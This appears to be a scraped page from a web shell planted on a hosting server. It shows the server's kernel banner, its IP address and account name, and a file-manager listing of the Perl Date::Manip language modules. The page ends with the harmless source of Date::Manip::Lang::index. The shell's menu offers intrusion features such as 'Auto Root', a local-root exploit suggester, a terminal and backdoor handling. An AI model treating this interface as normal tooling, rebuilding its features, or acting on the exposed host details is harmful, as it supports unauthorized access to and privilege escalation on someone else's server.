Linux sh52.ich-4.com 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
Server IP : 198.143.147.58 & Your IP : 216.73.217.21
Domains :
Cant Read [ /etc/named.conf ]
User : actualbuzz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
perl5 /
vendor_perl /
Date /
Manip /
Lang /
Delete
Unzip
Name
Size
Permission
Date
Action
catalan.pm
5.07
KB
-rw-r--r--
2021-03-01 20:03
catalan.pod
10.05
KB
-rw-r--r--
2021-03-01 20:06
danish.pm
4.29
KB
-rw-r--r--
2021-03-01 20:03
danish.pod
9.23
KB
-rw-r--r--
2021-03-01 20:06
dutch.pm
7.05
KB
-rw-r--r--
2021-03-01 20:03
dutch.pod
11.08
KB
-rw-r--r--
2021-03-01 20:06
english.pm
4.58
KB
-rw-r--r--
2021-03-01 20:03
english.pod
9.57
KB
-rw-r--r--
2021-03-01 20:06
finnish.pm
8.2
KB
-rw-r--r--
2021-03-01 20:03
finnish.pod
12.33
KB
-rw-r--r--
2021-03-01 20:06
french.pm
5.88
KB
-rw-r--r--
2021-03-01 20:03
french.pod
10.77
KB
-rw-r--r--
2021-03-01 20:06
german.pm
6.32
KB
-rw-r--r--
2021-03-01 20:03
german.pod
10.67
KB
-rw-r--r--
2021-03-01 20:06
index.pm
2.14
KB
-rw-r--r--
2021-03-01 20:03
italian.pm
5.61
KB
-rw-r--r--
2021-03-01 20:03
italian.pod
10.65
KB
-rw-r--r--
2021-03-01 20:06
norwegian.pm
4.63
KB
-rw-r--r--
2021-03-01 20:03
norwegian.pod
9.6
KB
-rw-r--r--
2021-03-01 20:06
polish.pm
7.91
KB
-rw-r--r--
2021-03-01 20:03
polish.pod
11.99
KB
-rw-r--r--
2021-03-01 20:06
portugue.pm
5.87
KB
-rw-r--r--
2021-03-01 20:03
portugue.pod
10.72
KB
-rw-r--r--
2021-03-01 20:06
romanian.pm
7.76
KB
-rw-r--r--
2021-03-01 20:03
romanian.pod
11.6
KB
-rw-r--r--
2021-03-01 20:06
russian.pm
10.41
KB
-rw-r--r--
2021-03-01 20:03
russian.pod
14.56
KB
-rw-r--r--
2021-03-01 20:06
spanish.pm
9.76
KB
-rw-r--r--
2021-03-01 20:03
spanish.pod
12.77
KB
-rw-r--r--
2021-03-01 20:06
swedish.pm
4.89
KB
-rw-r--r--
2021-03-01 20:03
swedish.pod
9.81
KB
-rw-r--r--
2021-03-01 20:06
turkish.pm
5.26
KB
-rw-r--r--
2021-03-01 20:03
turkish.pod
10.29
KB
-rw-r--r--
2021-03-01 20:06
Save
Rename
package Date::Manip::Lang::index; # Copyright (c) 2003-2021 Sullivan Beck. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. ######################################################################## ######################################################################## =pod =head1 NAME Date::Manip::Lang::index - An index of languages supported by Date::Manip =head1 SYNPOSIS This module is not intended to be used directly. Other Date::Manip modules will load it as needed. =cut require 5.010000; use strict; use warnings; our($VERSION); $VERSION='6.85'; our(%Lang); # A list of languages, and their module name %Lang = qw( catalan catalan ca catalan danish danish da danish dutch dutch nederlands dutch nl dutch english english en english en_us english finnish finnish fi finnish fi_fi finnish french french fr french fr_fr french german german de german de_de german italian italian it italian it_it italian norwegian norwegian nb norwegian nb_no norwegian polish polish pl polish pl_pl polish portuguese portugue pt portugue pt_pt portugue romanian romanian ro romanian ro_ro romanian russian russian ru russian ru_ru russian spanish spanish es spanish es_es spanish swedish swedish sv swedish turkish turkish tr turkish tr_tr turkish ); 1;